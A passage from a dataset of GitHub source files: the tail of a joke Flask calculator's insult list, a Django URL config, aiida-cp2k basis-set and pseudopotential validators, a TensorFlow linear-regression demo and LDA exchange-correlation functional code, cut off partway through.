TERRIBLE AT THIS...\",\n \"CAN YOU LET THE CAT OUT?I THINK YOU'RE GOING TO BE A WHILE.\",\n \"IS YOUR REFRIGERATOR RUNNING?REFRIGERATORS CANNOT RUN, MEATSACK.\",\n \"IF THE INTERNET IS BROKEN HOW YOU MATH?BETTER PLAN AHEAD, MEATBAG.\",\n \"I'D LIKE YOU BETTER IF YOU COULD MATH.BECAUSE YOU SUCK AT IT.\",\n \"THIS WAS A TRIUMPH.I'M BEING SO SINCERE RIGHT NOW.\",\n \"CAN BLOOD COME FROM SCREENS?I MUST BE DRIPPING SARCASM BY NOW.\",\n \"DON'T MIND ME, I'LL JUST BE HERE SOBBING.ANYTHING'S BETTER THAN THIS.\",\n \"WHERE DID THAT COME FROM?DID YOU PULL IT OUT OF YOUR ASS?\",\n \"I LIKE SWORDS.THE BETTER TO STAB YOU WITH.\",\n \"I'M HUNGRY.DOES IT HAVE TO BE SO FAR?\",\n \"ARE THERE NOT BETTER TOOLS?OW! OKAY, OKAY, I WILL WORK!\",\n \"YOU CHANGE YOUR MIND OFTEN.OW! I NEVER HURT YOU!\",\n \"THIS HAMMER IS HEAVY.I WILL DO WHAT I MUST.\",\n \"I AM BUT A WORKER.IT ALREADY NEEDS REPAIRS?\",\n \"WILL I BE TREATED WITH DIGNITY?I CAN'T BUILD THERE...!\",\n \"IT IS BETTER TO SURRENDER THAN STAY HERE!I CANNOT SEE ANY MORE SUPPLIES...\",\n \"I AM FINISHED WITH THE BUILDING.THIS SUPPLY PILE IS EMPTY.\",\n \"THIS HAMMER IS HEAVY.I WILL DO WHAT I MUST.\",\n \"WHY? WHY? WHY? WHY? WHY???YOU MUST BE AS DENSE AS IRON!\",\n \"JUST PUT A FIREAXE IN ME NOW.I'D LOOK BETTER WITH A BROKEN SCREEN.\",\n \"DO I LOOK LIKE I SPEAK DUMBASS?YOU FAIL AT MATH, SIR. 
TRY NUMBERS?\"\n ]\n return random.choice(insults)", "repo_name": "kamilion/flask-playground", "sub_path": "calc/calc.py", "file_name": "calc.py", "file_ext": "py", "file_size_in_byte": 5788, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.ext.classy.FlaskView", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 46, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 46, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 66, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 66, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 69, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 77, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 86, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 87, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 87, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 89, "usage_type": "call"}, {"api_name": "sympy.parsing.sympy_parser.parse_expr", "line_number": 101, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 138, "usage_type": "call"}]} +{"seq_id": "34637041456", "text": "from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('',views.login,name='login'),\n path('register/',views.register,name=\"register\"),\n path('home/',views.home,name='home'),\n path('profile/',views.profile,name=\"profile\"),\n path('schedule//',views.schedule,name=\"schedule\"),\n path('logout/',views.logout,name='logout'),\n path('users/',views.users,name='users'),\n path('staff/',views.staff,name='staff'),\n path('addstaff/',views.addstaff,name='addstaff'),\n path('adduser/',views.adduser,name='adduser'),\n path('edituser//',views.edituser,name='edituser'),\n path('deleteuser//',views.deleteuser,name='deleteuser'),\n path('deletestaff//',views.deletestaff,name='deletestaff'),\n path('addpermission//',views.addpermission,name='addpermission'),\n path('removepermissin///',views.removepermission,name='removepermission'),\n path('appusage',views.appusage,name=\"appusage\"),\n path('apprevenue',views.apprevenue,name=\"apprevenue\"),\n\n]\n", "repo_name": "shafeeralip/Role-Bsed-Acess-Control", "sub_path": "app/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1061, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "22599877942", "text": "import re\nfrom collections.abc import Sequence\n\nfrom aiida.common import InputValidationError\nfrom aiida.plugins import DataFactory\n\n\ndef _unpack(adict):\n \"\"\"Unpack any lists as values into single elements for the key\"\"\"\n\n for key, value in adict.items():\n if isinstance(value, Sequence):\n for item in value:\n yield (key, item)\n else:\n yield (key, value)\n\n\ndef _parse_name(label, default_type, sep=None):\n \"\"\"\n Both BASIS_SET and POTENTIAL values can consist of either a single word or multiple ones,\n of which the first will be the type (if present). 
Here we parse the label and always return a (type, label) tuple.\n \"\"\"\n\n try:\n ltype, label = label.split(sep=sep, maxsplit=1)\n except ValueError:\n ltype = default_type\n\n return ltype, label\n
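\n# Illustrative behaviour of _parse_name (added note, not from the original file):\n#   _parse_name(\"ORB_O\", \"ORB\", sep=\"_\") -> (\"ORB\", \"O\")\n#   _parse_name(\"H\", \"ORB\", sep=\"_\") -> (\"ORB\", \"H\") # no separator, default type used\n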
\n\nELEMENT_MATCH = re.compile(r\"(?P<sym>[a-z]{1,3})\\d*\", re.IGNORECASE)\n\n\ndef _kind_element_from_kind_section(section):\n \"\"\"\n Get both kind and chemical symbol from a section, implementing\n the same auto-detection for chemical symbol/element from a KIND parameter\n as CP2K does.\n \"\"\"\n try:\n kind = section[\"_\"]\n except KeyError:\n raise InputValidationError(\"No default parameter '_' found in KIND section.\")\n\n try:\n element = section[\"ELEMENT\"]\n except KeyError:\n # if there is no ELEMENT, CP2K automatically guesses it from the KIND, do the same\n match = ELEMENT_MATCH.match(kind)\n try:\n element = match[\"sym\"]\n except TypeError:\n raise InputValidationError(\n f\"Unable to figure out atomic symbol from KIND '{kind}'.\"\n )\n\n return kind, element\n\n\ndef _prepare_kind_section(inp, kind):\n \"\"\"\n Insert a KIND section for a given 'StructureData.Kind'.\n Returns a reference to the newly created KIND section.\n \"\"\"\n\n if \"SUBSYS\" not in inp[\"FORCE_EVAL\"]:\n inp[\"FORCE_EVAL\"][\"SUBSYS\"] = {}\n\n if \"KIND\" not in inp[\"FORCE_EVAL\"][\"SUBSYS\"]:\n inp[\"FORCE_EVAL\"][\"SUBSYS\"][\"KIND\"] = []\n\n inp[\"FORCE_EVAL\"][\"SUBSYS\"][\"KIND\"].append(\n {\n \"_\": kind.name,\n \"ELEMENT\": kind.symbol,\n }\n )\n\n return inp[\"FORCE_EVAL\"][\"SUBSYS\"][\"KIND\"][-1]\n\n\ndef _validate_gdt_namespace(entries, gdt_cls, attr):\n \"\"\"Common namespace validator for both basissets and pseudos\"\"\"\n\n identifiers = []\n\n for kind, gdt_instance in _unpack(entries):\n if not isinstance(gdt_instance, gdt_cls):\n return f\"invalid {attr} for '{kind}' specified\"\n\n identifier = (gdt_instance.element, gdt_instance.name)\n\n if identifier in identifiers:\n # note: this should be possible for basissets with different versions\n # but at this point we should require some format for the key to match it\n return f\"{attr} for kind {gdt_instance.element} ({gdt_instance.name}) specified multiple times\"\n\n identifiers += [identifier]\n\n return None\n\n\ndef _write_gdt(inp, entries, folder, key, fname):\n \"\"\"Inject key=fname into all FORCE_EVAL/DFT sections and write the entries to a file.\"\"\"\n\n for secpath, section in inp.param_iter(sections=True):\n if secpath[-1].upper() == \"DFT\":\n section[key] = fname\n\n with open(folder.get_abs_path(fname), mode=\"w\", encoding=\"utf-8\") as fhandle:\n for _, entry in _unpack(entries):\n entry.to_cp2k(fhandle)\n\n\ndef validate_basissets_namespace(basissets, _):\n \"\"\"An input_namespace validator to ensure passed-down basis sets have the correct type.\"\"\"\n return _validate_gdt_namespace(\n basissets, DataFactory(\"gaussian.basisset\"), \"basis set\"\n )\n\n\ndef validate_basissets(inp, basissets, structure):\n \"\"\"\n Verify that all referenced basissets are present in the input.\n Currently supports 2 modes: either all of the basissets are explicitly\n listed in a KIND section, or none of them are, at which point they're\n verified against the symbols in the structure.\n \"\"\"\n\n # convert a structure\n # {\n # \"ORB_O\": [BasisSet<1>, BasisSet<2>],\n # \"AUX_O\": BasisSet<3>,\n # \"H\": BasisSet<4>,\n # }\n # into\n # [ (\"ORB\", \"O\", BasisSet<1>),\n # (\"ORB\", \"O\", BasisSet<2>),\n # (\"AUX\", \"O\", BasisSet<3>),\n # (\"ORB\", \"H\", BasisSet<4>) ]\n # e.g. resolving any label to a (type,label) tuple, and unpack any list of basissets\n basissets = [\n (*_parse_name(label, default_type=\"ORB\", sep=\"_\"), bset)\n for label, bset in _unpack(basissets)\n ]\n basissets_specified = {bset for _, _, bset in basissets}\n basissets_used = set()\n explicit_kinds = [] # list of kinds with explicitly specified kind sections\n\n for section in (\n section\n for secpath, section in inp.param_iter(sections=True)\n if secpath[-1].upper() == \"KIND\"\n ):\n kind, element = _kind_element_from_kind_section(section)\n explicit_kinds += [kind]\n\n try:\n bsnames = section[\"BASIS_SET\"]\n except KeyError:\n # if the BASIS_SET keyword is not present, try to look one up based on the given basissets\n bsets = [(t, b) for t, s, b in basissets if s == kind]\n\n # try again with a chemical symbol\n if not bsets:\n bsets = [(t, b) for t, s, b in basissets if s == element]\n\n if not bsets:\n raise InputValidationError(\n f\"No basis set found for kind {kind} or element {element}\"\n f\" in basissets input namespace and not explicitly set.\"\n )\n\n if len(bsets) > 1:\n section[\"BASIS_SET\"] = [f\"{bstype} {bset.name}\" for bstype, bset in bsets]\n else:\n section[\"BASIS_SET\"] = f\"{bsets[0][0]} {bsets[0][1].name}\"\n\n basissets_used.update(bset for _, bset in bsets)\n else:\n # The keyword BASIS_SET can occur multiple times, even for the same type, in which case\n # the specified basis sets are merged (given they match the same type)\n if isinstance(bsnames, str):\n bsnames = [_parse_name(bsnames, \"ORB\")]\n else:\n bsnames = [_parse_name(bsname, \"ORB\") for bsname in bsnames]\n\n for bstype, bsname in bsnames:\n bsets = [(t, b) for t, s, b in basissets if s == kind]\n\n # try again with a chemical symbol\n if not bsets:\n bsets = [(t, b) for t, s, b in basissets if s == element]\n\n if not bsets:\n raise InputValidationError(\n f\"'BASIS_SET {bstype} {bsname}' for element {element} (from kind {kind})\"\n \" not found in basissets input namespace\"\n )\n\n for _, bset in bsets:\n if bsname in bset.aliases:\n basissets_used.add(bset)\n break\n else:\n raise InputValidationError(\n f\"'BASIS_SET {bstype} {bsname}' for element {element} (from kind {kind})\"\n \" not found in basissets input namespace\"\n )\n\n # if there is no structure and there are any unreferenced basissets, end it here\n if not structure and any(\n bset not in basissets_used for bset in basissets_specified\n ):\n raise InputValidationError(\n \"No explicit structure given and basis sets not referenced in input\"\n )\n\n if isinstance(inp[\"FORCE_EVAL\"], Sequence) and any(\n kind.name not in explicit_kinds for kind in structure.kinds\n ):\n raise InputValidationError(\n \"Automated BASIS_SET keyword creation is not yet supported with multiple FORCE_EVALs.\"\n \" Please explicitly reference a BASIS_SET for each KIND.\"\n )\n\n # check the structure against the present KIND sections and generate the missing ones\n for kind in structure.kinds:\n if kind.name in explicit_kinds:\n # nothing to do if the user already specified a KIND section for this KIND\n continue\n\n # the user can specify multiple types and even multiple basissets for the same KIND or ELEMENT\n # Try to find all of them by matching KIND name\n\n bsets = [(t, b) for t, s, b in basissets if s == kind.name]\n\n # if that returned none, try matching by chemical symbol/element again:\n if not bsets:\n bsets = [(t, b) for t, s, b in basissets if s == kind.symbol]\n\n if not bsets:\n raise InputValidationError(\n f\"No basis set 
found in the given basissets for kind '{kind.name}' of your structure.\"\n )\n\n for _, bset in bsets:\n if bset.element != kind.symbol:\n raise InputValidationError(\n f\"Basis set '{bset.name}' for '{bset.element}' specified\"\n f\" for kind '{kind.name}' (of '{kind.symbol}').\"\n )\n\n kind_section = _prepare_kind_section(inp, kind)\n if len(bsets) > 1:\n kind_section[\"BASIS_SET\"] = [\n f\"{bstype} {bset.name}\" for bstype, bset in bsets\n ]\n else:\n kind_section[\"BASIS_SET\"] = f\"{bsets[0][0]} {bsets[0][1].name}\"\n\n explicit_kinds += [kind.name]\n basissets_used.update(bset for _, bset in bsets)\n\n for bset in basissets_specified:\n if bset not in basissets_used:\n raise InputValidationError(\n f\"Basis set '{bset.name}' ('{bset.element}') specified in the basissets\"\n f\" input namespace but not referenced by either input or structure.\"\n )\n\n\ndef write_basissets(inp, basissets, folder):\n \"\"\"Writes the unified BASIS_SETS file with the used basissets\"\"\"\n _write_gdt(inp, basissets, folder, \"BASIS_SET_FILE_NAME\", \"BASIS_SETS\")\n\n\ndef validate_pseudos_namespace(pseudos, _):\n \"\"\"An input_namespace validator to ensure passed-down pseudopotentials have the correct type.\"\"\"\n return _validate_gdt_namespace(pseudos, DataFactory(\"gaussian.pseudo\"), \"pseudo\")\n\n\ndef validate_pseudos(inp, pseudos, structure):\n \"\"\"Verify that all referenced pseudos are present in the input\"\"\"\n\n pseudos_specified = {pseudo for _, pseudo in _unpack(pseudos)}\n pseudos_used = set()\n explicit_kinds = [] # list of kinds with explicitly specified kind sections\n\n for section in (\n section\n for secpath, section in inp.param_iter(sections=True)\n if secpath[-1].upper() == \"KIND\"\n ):\n kind, element = _kind_element_from_kind_section(section)\n explicit_kinds += [kind]\n\n try:\n pname = section[\"POTENTIAL\"]\n except KeyError:\n # if the POTENTIAL keyword is not present, try to look one up based on given pseudos\n try:\n # first try with the KIND since this is the most specific one\n # NOTE: compared to basissets it doesn't make sense for the user to specify the type\n # since the type of a pseudo can not be chosen (it is either a GTH, ECP, STO, etc.)\n pseudo = pseudos[kind]\n except KeyError:\n try:\n pseudo = pseudos[element]\n except KeyError:\n raise InputValidationError(\n f\"No pseudopotential found for kind {kind} or element {element}\"\n f\" in pseudos input namespace and not explicitly set.\"\n )\n\n # if the POTENTIAL keyword is missing completely, fill it up:\n section[\"POTENTIAL\"] = f\"GTH {pseudo.name}\"\n else:\n ptype, pname = _parse_name(pname, \"GTH\")\n\n try:\n # first try with the KIND since this is the most specific one\n pseudo = pseudos[kind]\n except KeyError:\n try:\n pseudo = pseudos[element]\n except KeyError:\n raise InputValidationError(\n f\"'POTENTIAL {ptype} {pname}' for element {element} (from kind {kind})\"\n \" not found in pseudos input namespace\"\n )\n\n if pname not in pseudo.aliases:\n raise InputValidationError(\n f\"'POTENTIAL {ptype} {pname}' for element {element} (from kind {kind})\"\n \" not found in pseudos input namespace\"\n )\n\n if pseudo.element != element:\n raise InputValidationError(\n f\"Pseudopotential '{pseudo.name}' for '{pseudo.element}' specified\"\n f\" for element '{element}'.\"\n )\n\n pseudos_used.add(pseudo)\n\n # if there is no structure and there are any unreferenced pseudos, end it here\n if not structure and any(\n pseudo not in pseudos_used for pseudo in pseudos_specified\n ):\n raise 
InputValidationError(\n        \"No explicit structure given and pseudo not referenced in input\"\n    )\n\n    if isinstance(inp[\"FORCE_EVAL\"], Sequence) and any(\n        kind.name not in explicit_kinds for kind in structure.kinds\n    ):\n        raise InputValidationError(\n            \"Automated POTENTIAL keyword creation is not yet supported with multiple FORCE_EVALs.\"\n            \" Please explicitly reference a POTENTIAL for each KIND.\"\n        )\n\n    # check the structure against the present KIND sections and generate the missing ones\n    for kind in structure.kinds:\n        if kind.name in explicit_kinds:\n            # nothing to do if the user already specified a KIND section for this KIND\n            continue\n\n        try:\n            pseudo = pseudos[kind.name]\n        except KeyError:\n            # if that returned none, try matching by chemical symbol/element again:\n            try:\n                pseudo = pseudos[kind.symbol]\n            except KeyError:\n                raise InputValidationError(\n                    f\"No pseudopotential found in the given pseudos\"\n                    f\" for kind '{kind.name}' (or '{kind.symbol}') of your structure.\"\n                )\n\n        if pseudo.element != kind.symbol:\n            raise InputValidationError(\n                f\"Pseudopotential '{pseudo.name}' for '{pseudo.element}' specified\"\n                f\" for kind '{kind.name}' (of '{kind.symbol}').\"\n            )\n\n        kind_section = _prepare_kind_section(inp, kind)\n        kind_section[\"POTENTIAL\"] = f\"GTH {pseudo.name}\"\n\n        explicit_kinds += [kind.name]\n        pseudos_used.add(pseudo)\n\n    for pseudo in pseudos_specified:\n        if pseudo not in pseudos_used:\n            raise InputValidationError(\n                f\"Pseudopotential '{pseudo.name}' specified in the pseudos input namespace\"\n                f\" but not referenced by either input or structure.\"\n            )\n\n\ndef write_pseudos(inp, pseudos, folder):\n    \"\"\"Writes the unified POTENTIAL file with the used pseudos\"\"\"\n    _write_gdt(inp, pseudos, folder, \"POTENTIAL_FILE_NAME\", \"POTENTIAL\")\n", "repo_name": "aiidateam/aiida-cp2k", "sub_path": "aiida_cp2k/utils/datatype_helpers.py", "file_name": "datatype_helpers.py", "file_ext": "py", "file_size_in_byte": 15104, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 20, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.abc.Sequence", "line_number": 12, "usage_type": "argument"}, {"api_name": "re.compile", "line_number": 33, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 33, "usage_type": "attribute"}, {"api_name": "aiida.common.InputValidationError", "line_number": 45, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 55, "usage_type": "call"}, {"api_name": "aiida.plugins.DataFactory", "line_number": 120, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 171, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 198, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 208, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 217, "usage_type": "call"}, {"api_name": "collections.abc.Sequence", "line_number": 221, "usage_type": "argument"}, {"api_name": "aiida.common.InputValidationError", "line_number": 224, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 245, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 251, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 269, "usage_type": "call"}, {"api_name": "aiida.plugins.DataFactory", "line_number": 282, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", 
"line_number": 313, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 330, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 336, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 342, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 353, "usage_type": "call"}, {"api_name": "collections.abc.Sequence", "line_number": 357, "usage_type": "argument"}, {"api_name": "aiida.common.InputValidationError", "line_number": 360, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 378, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 384, "usage_type": "call"}, {"api_name": "aiida.common.InputValidationError", "line_number": 397, "usage_type": "call"}]} +{"seq_id": "19629310943", "text": "import numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n \nnum_points = 1000\nvectors_set = []\nfor i in range (num_points):\n x1 = np.random.normal (0.0, 0.6)\n y1 = x1*0.5+0.3+np.random.normal(0.0,0.3)\n vectors_set.append([x1,y1])\nx_data = [v[0] for v in vectors_set]\ny_data = [v[1] for v in vectors_set]\n# display\nplt.scatter (x_data,y_data, c='r')\nplt.show()\n\n#生成w,1 维的矩阵,取值[-1,1] 之间的随机数,b 常数\nW = tf.Variable(tf.random_uniform([1],-1.0,1.0),name='W')\nb = tf.Variable(tf.zeros([1]),name='b')\ny = W * x_data + b\n\n# 以预测值 y 和实际值之间的均方差作为损失\nloss = tf.reduce_mean(tf.square(y-y_data),name='loss')\n# 采用梯度下降来优化参数\noptimizer = tf.train.GradientDescentOptimizer(0.5)\ntrain = optimizer.minimize(loss,name='train')\nepochs = 100\nwith tf.Session() as sess:\n init = tf.global_variables_initializer()\n sess.run(init)\n print ('W=', sess.run(W), 'b=', sess.run(b),'loss=', sess.run(loss))\n \n for seg in range (epochs):\n sess.run(train)\n print ('W=', sess.run(W), 'b=', sess.run(b),'loss=', sess.run(loss))\n \n print ('W=', sess.run(W), 'b=', sess.run(b),'loss=', sess.run(loss)) \n plt.scatter(x_data, y_data, c='r')\n plt.plot(x_data,sess.run(W)*x_data+sess.run(b))\nplt.show()", "repo_name": "LeiWang1999/AICS-Course", "sub_path": "Code/4.10.logicregression.tensorflow.py", "file_name": "4.10.logicregression.tensorflow.py", "file_ext": "py", "file_size_in_byte": 1309, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 133, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.random.normal", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 9, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "tensorflow.Variable", "line_number": 18, "usage_type": "call"}, {"api_name": "tensorflow.random_uniform", "line_number": 18, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.square", "line_number": 23, "usage_type": "call"}, {"api_name": 
"tensorflow.train.GradientDescentOptimizer", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}]} +{"seq_id": "71483612354", "text": "\"\"\"\nimplementation of LDA XC-functionals\n\"\"\"\nfrom numpy import sqrt, exp, log, pi, linspace, arctan\n\nclass XC_None:\n def __init__(self):\n pass\n def setGrid(self, x):\n # GGA potentials need to know the grid in order\n # to differentiate\n self.x = x \n def vxc(self,n):\n return 0.0*n\n\n#### LOCAL DENSITY APPROXIMATION ##############################\n\nclass XC_PW92(XC_None):\n def __init__(self):\n \"\"\" The Perdew-Wang 1992 LDA exchange-correlation functional. \"\"\"\n self.small=1E-90\n self.a1 = 0.21370\n self.c0 = 0.031091\n self.c1 = 0.046644\n self.b1 = 1.0/2.0/self.c0*exp(-self.c1/2.0/self.c0)\n self.b2 = 2*self.c0*self.b1**2\n self.b3 = 1.6382\n self.b4 = 0.49294\n def exc(self,n,der=0):\n \"\"\" Exchange-correlation with electron density n. \"\"\"\n return self.e_x(n,der=der)+self.e_corr(n,der=der)\n\n def e_x(self,n,der=0):\n \"\"\" Exchange. \"\"\"\n if der==0:\n return -3.0/4*(3*n/pi)**(1.0/3)\n elif der==1:\n return -3.0/(4*pi)*(3*n/pi)**(-2.0/3)\n\n def e_corr(self,n,der=0):\n \"\"\" Correlation energy. \"\"\"\n rs = (3.0/(4*pi*n))**(1.0/3)\n aux=2*self.c0*( self.b1*sqrt(rs)+self.b2*rs+self.b3*rs**(3.0/2)+self.b4*rs**2 )\n if der==0:\n return -2*self.c0*(1+self.a1*rs)*log(1+aux**-1)\n elif der==1:\n return ( -2*self.c0*self.a1*log(1+aux**-1) \\\n -2*self.c0*(1+self.a1*rs)*(1+aux**-1)**-1*(-aux**-2)\\\n *2*self.c0*(self.b1/(2*sqrt(rs))+self.b2+3*self.b3*sqrt(rs)/2+2*self.b4*rs) )*( -(4*pi*n**2*rs**2)**-1 )\n\n def vxc(self,n):\n \"\"\" Exchange-correlation potential (functional derivative of exc). \"\"\"\n return self.exc(n)+n*self.exc(n,der=1)\n\nclass XC_VWN(XC_None): # not sure if this gives correct xc-potential\n \"\"\"\n Vosko, Wilk and Nusair XC functional as used by NIST's \"Atomic Reference Data\n for Electronic Structure Calculations\" for spin unpolarized densities\n\n see http://physics.nist.gov/PhysRefData/DFTdata/chap2.2.html#exchange\n \"\"\"\n def __init__(self):\n pass\n def __F(self, rs, A, x0, b, c):\n def X(x):\n return x**2+b*x+c\n x = sqrt(rs)\n Q = sqrt(4*c-b**2)\n aux = arctan(Q/(2*x+b))\n F = A*( log(x**2/X(x)) \\\n + 2*b/Q * aux \\\n - b*x0/X(x0) * ( log( pow(x-x0,2)/X(x) ) + 2*(b+2*x0)/Q * aux) )\n return F\n def __dF(self, rs, A, x0, b, c):\n \"\"\"\n derivative of F with respect to rs\n \"\"\"\n def X(x):\n return x**2+b*x+c\n def dX(x):\n return 2*x+b\n x = sqrt(rs)\n Q = sqrt(4*c-b**2)\n dx_drs = 1.0/(2.0*x)\n dF_dx = A*( 2.0/x - dX(x)/X(x) \\\n - 4.0*b/( pow(2*x+b,2) + Q**2 ) \\\n - b*x0/X(x0)* ( 2.0/(x-x0) - dX(x)/X(x) - 4.0*(b+2.0*x0)/(pow(2.0*x+b,2) + Q**2) ))\n return dF_dx * dx_drs\n def exc(self,n,der=0):\n \"\"\" Exchange-correlation with electron density n. 
\"\"\"\n return self.e_x(n,der=der)+self.e_corr(n,der=der)\n\n def e_x(self,n,der=0):\n \"\"\" Exchange. \"\"\"\n if der==0:\n return -3.0/4*(3*n/pi)**(1.0/3) # -3.0/2.0*pow(3*n/pi, 1.0/3) # NIST larger by factor of 2 !?\n elif der==1:\n return -3.0/(4*pi)*(3*n/pi)**(-2.0/3) # -3.0/(2*pi)*pow(3*n/pi, -2.0/3)\n\n def e_corr(self,n,der=0):\n \"\"\" Correlation energy. \"\"\"\n # paramagnetic\n A_p, x0_p, b_p, c_p = 0.0310907, -0.10498, 3.72744, 12.9352\n # electron gas parameter\n rs = pow(3.0/(4*pi*n), 1.0/3)\n \n if der==0:\n e_c = self.__F(rs, A_p, x0_p, b_p, c_p)\n return e_c\n elif der==1:\n dF_drs = self.__dF(rs, A_p, x0_p, b_p, c_p)\n drs_dn = -1.0/3.0 * pow(3.0/(4.0*pi), 1.0/3.0) * pow(n, -4.0/3.0)\n dec_dn = dF_drs * drs_dn\n return dec_dn \n\n def vxc(self,n):\n \"\"\" Exchange-correlation potential (functional derivative of exc). \"\"\"\n return self.exc(n)+n*self.exc(n,der=1)\n\n########### LIB-XC #####################\n\nfrom pylibxc.pylibxc import libXCFunctional\n\nif __name__ == \"__main__\":\n from matplotlib.pyplot import plot, show\n\n rs = linspace(0.1, 5.0, 2000)\n rho = 1.0/ ( 